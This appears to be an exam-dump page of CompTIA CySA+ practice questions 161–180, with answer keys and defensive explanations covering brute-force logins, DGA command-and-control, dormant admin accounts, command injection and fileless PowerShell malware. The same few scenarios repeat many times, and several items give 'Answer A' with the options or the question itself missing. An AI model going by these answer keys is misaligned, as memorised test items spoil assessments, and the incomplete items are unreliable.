CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 9 Q161-180

Practice Exams:

View All

CompTIA

CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 9 Q161-180

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 161

A SOC analyst observes multiple failed login attempts targeting various administrative accounts from external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The scenario describes a classic brute-force attack. Brute-force attacks involve systematically attempting combinations of usernames and passwords to gain unauthorized access to systems. The presence of multiple failed login attempts targeting administrative accounts, especially with predictable username patterns, strongly indicates the use of automated attack tools rather than isolated human error.

Attackers often deploy distributed botnets to launch brute-force campaigns from multiple IP addresses. This evasion technique circumvents basic IP-based blocking and allows rapid testing of thousands of credentials. Such attacks can target weak, default, or reused passwords, aiming to compromise privileged accounts to escalate access or deploy malware.

Detection requires a multi-layered approach. SIEM solutions that aggregate authentication logs can identify patterns of failed login attempts, high-frequency access from unusual geolocations, or repeated access attempts outside normal business hours. Behavioral analysis, anomaly detection, and correlation with threat intelligence feeds can further identify ongoing brute-force campaigns.

Mitigation strategies include account lockout policies, which temporarily disable accounts after a defined number of failed attempts, and multi-factor authentication (MFA), which requires an additional verification factor beyond the password. Rate-limiting on authentication endpoints can slow attacks, providing time for detection and intervention.

Additional preventative measures include enforcing strong password policies, frequent password rotation, and user training on secure credential practices. Threat intelligence integration can help block IP addresses associated with known brute-force campaigns.

B Fileless malware using living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate tools like PowerShell or WMI. It does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming system resources to disrupt service availability rather than attempting credential compromise.

D Phishing emails delivering malicious attachments

Phishing attacks rely on user interaction to deliver malware or steal credentials. Automated login attempts across multiple accounts do not align with typical phishing activity.

Question 162

An analyst detects abnormal outbound traffic from a host to multiple unknown external IP addresses over high-numbered ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of high-volume DNS queries to pseudo-random domains and outbound connections to unknown external IPs over non-standard ports is indicative of malware leveraging a domain generation algorithm (DGA) to maintain resilient command-and-control (C2) communication. DGAs dynamically generate domains that allow malware to maintain contact with C2 servers even if some domains are blocked or taken down.

DGAs are commonly used by sophisticated malware families and advanced persistent threat (APT) actors. They enable persistent, stealthy communication with compromised hosts while evading static blacklist-based security controls. Indicators of DGA activity include high-entropy domain names, frequent DNS queries, repeated failed resolutions, and connections to non-standard ports.

Detection and mitigation require a combination of network and endpoint monitoring. SIEM correlation, behavioral analysis, and machine learning algorithms can identify unusual DNS and network patterns indicative of DGA activity. Reverse-engineering the malware or the DGA algorithm allows prediction of future domains, enabling proactive domain blocking.

Mitigation strategies include isolating affected endpoints, blocking known malicious domains and IPs, performing malware eradication, and conducting forensic investigations. Threat intelligence integration helps identify IOCs, associated malware families, and attack techniques. Network segmentation, strict egress filtering, application whitelisting, and user education enhance defenses against DGA-based malware.

B Routine software update traffic

Software updates connect to known servers on standard ports. Randomized domains and high-frequency queries are inconsistent with legitimate update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources to degrade availability rather than establishing covert communication with C2 servers.

D Misconfigured internal monitoring system

While misconfigurations may generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains and outbound connections over unknown IPs.

Question 163

A security audit identifies multiple privileged service accounts that have not been used in over six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts are high-risk because attackers may exploit them to gain unauthorized access, maintain persistence, or perform lateral movement. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, reducing the attack surface and enforcing least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, potentially leaving dormant accounts vulnerable. Automated processes provide uniform enforcement and improve security posture.

Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring. Attempts to access deprovisioned accounts can indicate insider threats or credential compromise. Automated deprovisioning reduces operational risk and strengthens security controls by eliminating dormant privileged accounts from the environment.

B Increase password complexity requirements for service accounts

Complex passwords help prevent brute-force attacks but do not reduce the inherent risk of unused privileged accounts.

C Disable all external SSH access

SSH restrictions reduce external attack vectors but do not address dormant account risks.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate risks associated with dormant accounts.

Question 164

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when an application fails to validate user input, allowing execution of arbitrary OS commands. Server-side input validation ensures input conforms to expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable code, effectively preventing injection attacks.

Secure coding practices, input validation, output encoding, and adherence to secure frameworks reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by blocking requests matching known attack signatures.

Monitoring anomalous input and logging validation failures enable early detection. Remediation includes code updates, secure coding training, and regular penetration testing. TLS encryption secures communication but does not prevent injection. Session timeouts mitigate session hijacking but not input validation vulnerabilities. Firewalls cannot effectively inspect application-layer input, making server-side input validation with parameterized commands the primary mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not address command injection vulnerabilities.

C Increase session timeout values

Session timeouts reduce the risk of session hijacking but do not prevent command injection attacks.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent application-layer vulnerabilities.

Question 165

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate tools such as PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating externally without leaving artifacts on disk indicate living-off-the-land malware, designed to bypass signature-based antivirus solutions.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound connections to unknown IPs, and deviations from normal system behavior. Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive measures include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and threat intelligence integration. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical for mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without traditional files, leveraging memory-resident execution and legitimate system tools to persist, evade detection, and maintain control over affected systems.

Question 166

A SOC analyst detects numerous failed login attempts targeting multiple privileged accounts from external IP addresses. The usernames follow predictable patterns, and login attempts are occurring at a very high frequency. Which of the following BEST describes the threat?

Answer A

Explanation:

A Brute-force attack targeting user credentials

The described scenario is a classic brute-force attack. Brute-force attacks are methods where an attacker systematically tries combinations of usernames and passwords to gain unauthorized access to systems or applications. Multiple failed login attempts targeting privileged accounts, especially with predictable username patterns, strongly suggest the use of automated tools, such as scripts or botnets, rather than isolated human errors.

Attackers often use distributed botnets, sending login attempts from multiple IP addresses simultaneously to evade detection and avoid simple IP-based blocking. These attacks aim to compromise weak passwords, default credentials, or reused passwords across multiple systems. Once credentials are obtained, attackers may escalate privileges, move laterally across networks, deploy malware, or exfiltrate sensitive data.

Detection requires a layered approach. SIEM solutions can aggregate logs from authentication systems to detect patterns of failed login attempts, unusual access attempts from atypical geolocations, or anomalous login times. Advanced analytics, including machine learning and behavioral modeling, help identify patterns indicative of brute-force campaigns.

Mitigation includes account lockout policies, which temporarily disable accounts after a certain threshold of failed attempts, and multi-factor authentication (MFA), which requires additional verification beyond passwords, greatly reducing the risk of compromise. Rate-limiting login attempts at the application or network layer slows attacks, giving analysts more time to respond.

Additional preventive measures include enforcing strong password policies, regular password rotation, user awareness training on secure credential practices, and integration with threat intelligence feeds to proactively block known malicious IPs and identify ongoing brute-force campaigns.

B Fileless malware using living-off-the-land techniques

Fileless malware operates in memory, leveraging legitimate tools such as PowerShell or WMI. It does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming network or application resources to disrupt availability rather than attempting credential compromise.

D Phishing emails delivering malicious attachments

Phishing attacks require user interaction to deliver malware or steal credentials. Automated login attempts targeting multiple accounts are inconsistent with typical phishing campaigns.

Question 167

An analyst detects abnormal outbound traffic from a host to multiple unknown external IP addresses over non-standard ports. DNS logs reveal frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of outbound connections over non-standard ports and high-frequency DNS queries to pseudo-random domains is indicative of malware employing a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs dynamically create domain names to allow malware to maintain contact with C2 servers even if previous domains are blocked or taken down.

DGAs are a hallmark of sophisticated malware campaigns and advanced persistent threat (APT) activity. They provide resilience and stealth, allowing malware to persist and communicate covertly with remote servers. Key indicators include high-entropy domain names, frequent DNS queries, repeated failed domain resolutions, and outbound connections over unusual ports.

Detection and mitigation require correlation of network and DNS logs, endpoint telemetry, and behavioral analysis. Machine learning can identify unusual patterns, such as high entropy in domain names or anomalous query frequency. Reverse-engineering the DGA can predict future domains, allowing preemptive blocking.

Mitigation strategies include isolating affected endpoints, blocking malicious domains and IP addresses, eradicating malware, and conducting thorough forensic investigations. Integration with threat intelligence feeds enables identification of malware families, associated indicators of compromise (IOCs), and attack techniques. Defense-in-depth measures—such as network segmentation, egress filtering, application whitelisting, and user training—enhance resilience against DGA-enabled malware.

B Routine software update traffic

Software updates typically connect to known servers on standard ports. Randomized domains and high-frequency queries are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks overwhelm network resources but do not establish covert communication channels with pseudo-randomly generated domains.

D Misconfigured internal monitoring system

Misconfigurations may create abnormal traffic patterns, but they rarely generate high-frequency queries to pseudo-random domains or outbound connections to unknown IP addresses.

Question 168

A security audit identifies several privileged service accounts that have not been used for more than six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts present a significant security risk because attackers may exploit them for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a defined period of inactivity, reducing the attack surface and enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory frameworks, such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, potentially leaving dormant accounts exposed, while automation provides consistent and timely removal.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring. Logging attempts to access deprovisioned accounts can help detect insider threats or unauthorized access attempts. Automated deprovisioning reduces operational risk and strengthens security posture by eliminating dormant privileged accounts.

B Increase password complexity requirements for service accounts

Complex passwords help prevent brute-force attacks but do not mitigate the risks associated with inactive privileged accounts.

C Disable all external SSH access

SSH restrictions reduce exposure to remote attacks but do not address the inherent risk of dormant accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not prevent threats associated with dormant administrative accounts.

Question 169

During a penetration test, testers exploit unsanitized web input fields that allow operating system-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to validate user input, allowing arbitrary OS-level commands to execute. Server-side validation ensures input adheres to expected types, lengths, and patterns, while parameterized commands or prepared statements separate user input from executable code.

Secure coding practices, including input validation, output encoding, and adherence to security frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) can identify potential issues during development. Web application firewalls (WAFs) provide an additional layer by filtering known malicious requests.

Monitoring anomalous input attempts and logging validation failures allows early detection of attack attempts. Remediation includes code updates, secure coding training for developers, and periodic penetration testing. TLS encryption secures data in transit but does not prevent command injection. Session timeouts mitigate session hijacking but not input vulnerabilities. Firewalls cannot inspect application-level input effectively, making server-side input validation with parameterized commands the primary mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures secure transmission but does not prevent command injection vulnerabilities.

C Increase session timeout values

Session timeout policies reduce the risk of hijacking but do not address command injection.

D Add additional firewall rules at the perimeter

Firewalls operate at the network layer and cannot prevent application-layer input vulnerabilities.

Question 170

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate tools such as PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus detection.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation includes isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive measures include enforcing least privilege, application whitelisting, PowerShell script logging, script block logging, execution policy enforcement, and integrating threat intelligence to block malicious domains. A defense-in-depth strategy combining monitoring, anomaly detection, user training, and structured incident response is critical for mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, leveraging memory-resident execution and legitimate system tools for persistence, evasion, and control of compromised systems.

Question 171

A SOC analyst observes a spike in failed login attempts targeting several administrative accounts from multiple external IP addresses. The usernames follow predictable patterns, and the frequency of attempts is high. Which of the following BEST describes the threat?

Answer A

Explanation:

A Brute-force attack targeting user credentials

This scenario is indicative of a brute-force attack. Brute-force attacks involve systematically trying combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts, especially targeting administrative accounts with predictable usernames, strongly suggest the use of automated attack tools such as scripts, bots, or distributed botnets, rather than isolated human errors.

Attackers often distribute brute-force attempts across multiple IP addresses to avoid detection and IP-based blocking. Such attacks target weak, default, or reused passwords and are particularly effective against high-privilege accounts because compromising them allows attackers to escalate privileges, move laterally within networks, deploy malware, or exfiltrate sensitive information.

Detection requires a multi-layered approach. Security information and event management (SIEM) solutions can aggregate authentication logs to identify patterns of failed login attempts, unusual access from atypical geolocations, and attempts outside normal business hours. Machine learning and behavioral analytics can identify anomalies indicative of brute-force campaigns.

Mitigation strategies include account lockout policies that temporarily disable accounts after a specified number of failed attempts, multi-factor authentication (MFA) requiring additional verification beyond passwords, and rate-limiting login attempts to slow attacks. Complementary measures include enforcing strong password policies, rotating passwords regularly, educating users about credential hygiene, and integrating threat intelligence to block IP addresses associated with known brute-force campaigns.

B Fileless malware using living-off-the-land techniques

Fileless malware operates in memory using legitimate tools such as PowerShell or WMI and does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack
DDoS attacks overwhelm network resources to disrupt availability rather than attempting credential compromise.

D Phishing emails delivering malicious attachments
Phishing campaigns rely on user interaction to deliver malware or steal credentials, and automated login attempts across multiple accounts are inconsistent with phishing attacks.

Question 172
An analyst observes abnormal outbound traffic from a host to multiple unknown external IP addresses over non-standard ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of outbound connections over non-standard ports and high-frequency DNS queries to pseudo-random domains strongly suggests malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. DGAs dynamically generate domains to allow malware to communicate with C2 servers even if previous domains are blocked or taken down.

DGAs are frequently used by advanced persistent threat (APT) actors and sophisticated malware families. They provide resilience, stealth, and persistence, making it difficult for defenders to disrupt malware operations. Key indicators include high-entropy domains, frequent DNS queries, repeated failed resolutions, and outbound connections to unusual ports.

Detection requires correlating network and DNS logs, monitoring endpoints, and behavioral analysis. Machine learning and anomaly detection can highlight unusual query frequency and entropy. Reverse-engineering the DGA allows prediction of future domains, enabling proactive blocking.

Mitigation strategies include isolating infected hosts, blocking known malicious domains and IPs, eradicating malware, and performing forensic investigations. Threat intelligence can provide insight into associated malware families and techniques. Defense-in-depth measures such as network segmentation, egress filtering, application whitelisting, and user education are critical in countering DGA-based malware.

B Routine software update traffic

Legitimate updates connect to known servers using standard ports, and random domains or frequent high-entropy DNS queries are inconsistent with legitimate behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming systems to degrade availability, not establishing covert C2 communication channels.

D Misconfigured internal monitoring system

While misconfigurations can produce abnormal traffic, they rarely generate high-frequency queries to pseudo-random domains combined with outbound connections to unknown IP addresses.

Question 173

A security audit identifies several privileged service accounts that have not been used for more than six months but still retain administrative privileges. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts are high-risk because attackers may exploit them to gain unauthorized access, establish persistence, or perform lateral movement. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, reducing the attack surface and enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, leaving dormant accounts vulnerable, whereas automation ensures timely and consistent removal of unused accounts.

Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts can help detect insider threats or unauthorized access attempts. Automated deprovisioning reduces operational risk and strengthens security posture by eliminating dormant privileged accounts from the environment.

B Increase password complexity requirements for service accounts

While complex passwords help reduce the risk of brute-force attacks, they do not mitigate the threat posed by dormant privileged accounts.

C Disable all external SSH access

Restricting external SSH connections reduces the attack surface for remote attacks but does not address risks associated with unused privileged accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate threats associated with dormant administrative accounts.

Question 174

During a penetration test, testers exploit unsanitized web input fields, allowing operating system-level command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to properly validate user input, allowing arbitrary OS-level command execution. Server-side input validation ensures that all input matches expected patterns, types, and lengths, while parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.

Secure coding practices, input validation, output encoding, and adherence to secure frameworks reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) can filter known malicious request patterns as an additional protection layer.

Monitoring anomalous input attempts and logging validation failures allow early detection of potential attacks. Remediation includes code updates, developer secure coding training, and regular penetration testing. TLS encryption secures data in transit but does not prevent injection. Session timeout policies reduce session hijacking risk but do not address input vulnerabilities. Firewalls cannot inspect application-layer input effectively, making server-side validation with parameterized commands the most effective mitigation.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection attacks.

C Increase session timeout values

Session timeouts reduce session hijacking risk but do not address command injection.

D Add additional firewall rules at the perimeter

Network-level firewalls cannot prevent application-layer input vulnerabilities.

Question 175

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IP addresses. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware primarily resides in memory and leverages legitimate system tools such as PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with external IPs without leaving artifacts on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus detection.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive controls include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence feeds to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical to mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, using memory-resident execution and legitimate tools to persist, evade detection, and maintain control over compromised systems.

Question 176

A SOC analyst observes a sudden surge in failed login attempts targeting multiple administrative accounts from external IP addresses. Usernames follow predictable patterns, and attempts are occurring at a very high frequency. Which of the following BEST describes the threat?

Answer A

Explanation:

A Brute-force attack targeting user credentials

This scenario exemplifies a brute-force attack, a method in which an attacker systematically attempts numerous combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts targeting multiple administrative accounts with predictable usernames strongly indicate the use of automated attack tools or scripts, rather than sporadic human error.

Brute-force attacks are often distributed across multiple IP addresses via botnets, allowing attackers to circumvent IP-based rate-limiting and enhance the speed and effectiveness of their attacks. Such campaigns target weak, default, or reused passwords and are particularly dangerous when targeting high-privilege accounts, as successful compromise can enable attackers to escalate privileges, move laterally across networks, deploy malware, or exfiltrate sensitive data.

Detection requires layered monitoring and analytics. Security information and event management (SIEM) solutions aggregate authentication logs to detect patterns of failed login attempts, unusual geolocation access, or off-hours activity. Advanced analytics and machine learning can highlight abnormal authentication behavior and correlate attempts across accounts and systems to identify ongoing brute-force campaigns.

Mitigation involves a combination of technical and procedural controls. Account lockout policies temporarily disable accounts after a predefined number of failed attempts, reducing the effectiveness of automated attacks. Multi-factor authentication (MFA) introduces additional verification factors beyond passwords, mitigating the risk even if credentials are compromised. Rate-limiting login attempts at the application or network level slows the attack, providing analysts with critical detection and response time.

Additional preventive measures include enforcing strong password policies, rotating credentials regularly, conducting user training on secure password practices, and integrating threat intelligence feeds to block IP addresses associated with known brute-force campaigns. Combined, these strategies significantly reduce the likelihood of successful credential compromise and strengthen overall security posture.

B Fileless malware using living-off-the-land techniques

Fileless malware executes in memory using legitimate system tools such as PowerShell or WMI. It does not cause repeated login failures across multiple accounts, making this option inconsistent with the observed behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm systems and degrade availability rather than systematically attempting credential compromise.

D Phishing emails delivering malicious attachments

Phishing relies on user interaction to deliver malware or harvest credentials. Automated login attempts across multiple accounts are not consistent with phishing campaigns.

Question 177

An analyst observes abnormal outbound traffic from a host to unknown external IP addresses over high-numbered ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of outbound connections over high-numbered ports and frequent DNS queries to pseudo-randomly generated domains strongly indicates malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communication. DGAs dynamically generate domain names to allow malware to contact its C2 infrastructure even if certain domains are blocked or taken down.

DGAs are widely employed by advanced persistent threat (APT) groups and sophisticated malware families. This technique allows attackers to maintain resilient, covert communication channels with infected hosts, evading signature-based security tools. Indicators of DGA activity include high-entropy domains, repeated failed DNS resolutions, outbound connections over uncommon ports, and anomalous network traffic patterns.

Detection strategies involve correlating DNS and network traffic logs, monitoring endpoint telemetry, and employing behavioral analytics. Machine learning models can detect unusual DNS query patterns, high entropy, and anomalous query frequency indicative of DGA behavior. Reverse-engineering the malware or its DGA allows defenders to predict future domains and proactively block them.

Mitigation requires isolating compromised hosts to prevent further spread, blocking malicious domains and IP addresses, eradicating malware, and performing forensic analysis to determine the infection vector. Integration of threat intelligence feeds can provide actionable indicators of compromise (IOCs), including known malware families, domains, and C2 techniques. Defense-in-depth measures such as network segmentation, egress filtering, application whitelisting, endpoint detection and response (EDR), and user education enhance the organization’s resilience against DGA-enabled malware.

B Routine software update traffic

Legitimate software updates connect to known servers using standard ports. Randomized domain queries with high frequency are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt availability and do not establish covert communications with C2 infrastructure.

D Misconfigured internal monitoring system

While misconfigurations may generate abnormal traffic, they rarely result in frequent queries to pseudo-random domains combined with outbound connections to unknown external IPs.

Question 178

A security audit identifies multiple privileged service accounts that have not been used for over six months but still retain administrative privileges. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts are high-risk because attackers can exploit them for unauthorized access, lateral movement, and persistence within networks. Automated account deprovisioning ensures that accounts are disabled or removed after a predefined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, leaving dormant accounts vulnerable, whereas automation provides timely, consistent, and auditable removal of inactive accounts.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts can detect insider threats or attempted compromise. Automated account deprovisioning not only reduces operational risk but also enhances overall security posture by eliminating high-privilege accounts that are unnecessary or inactive.

B Increase password complexity requirements for service accounts

While strong passwords mitigate the risk of brute-force attacks, they do not reduce the inherent risk posed by dormant privileged accounts.

C Disable all external SSH access

Restricting SSH access reduces exposure to external attacks but does not mitigate risks associated with unused administrative accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not address the risks of dormant privileged accounts.

Question 179

During a penetration test, testers exploit unsanitized web input fields allowing operating system-level command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when applications fail to validate user input, allowing arbitrary OS-level commands to execute. Server-side input validation ensures input matches expected types, lengths, and formats, while parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.

Secure coding practices, including input validation, output encoding, and secure framework usage, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by filtering requests matching known attack signatures.

Monitoring and logging anomalous input attempts provide early detection. Remediation involves code updates, secure coding training for developers, and periodic penetration testing. TLS encryption ensures data in transit is secure but does not prevent injection. Session timeout policies reduce the risk of session hijacking but do not prevent command injection. Network firewalls cannot inspect application-layer input effectively, making server-side input validation with parameterized commands the most effective mitigation strategy.

B Enforce TLS encryption for all web traffic

TLS ensures secure transmission of data but does not prevent command injection vulnerabilities.

C Increase session timeout values

While helpful for session management, it does not address input validation or command injection risks.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect application-layer input effectively, making them ineffective against command injection.

Question 180

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus solutions.

Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include anomalous script execution, unusual outbound connections, and deviations from baseline system activity. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive measures include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration of threat intelligence feeds to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical to mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware does not create files on disk, instead operating in memory and using legitimate tools to persist, evade detection, and maintain control of compromised systems.

Related posts: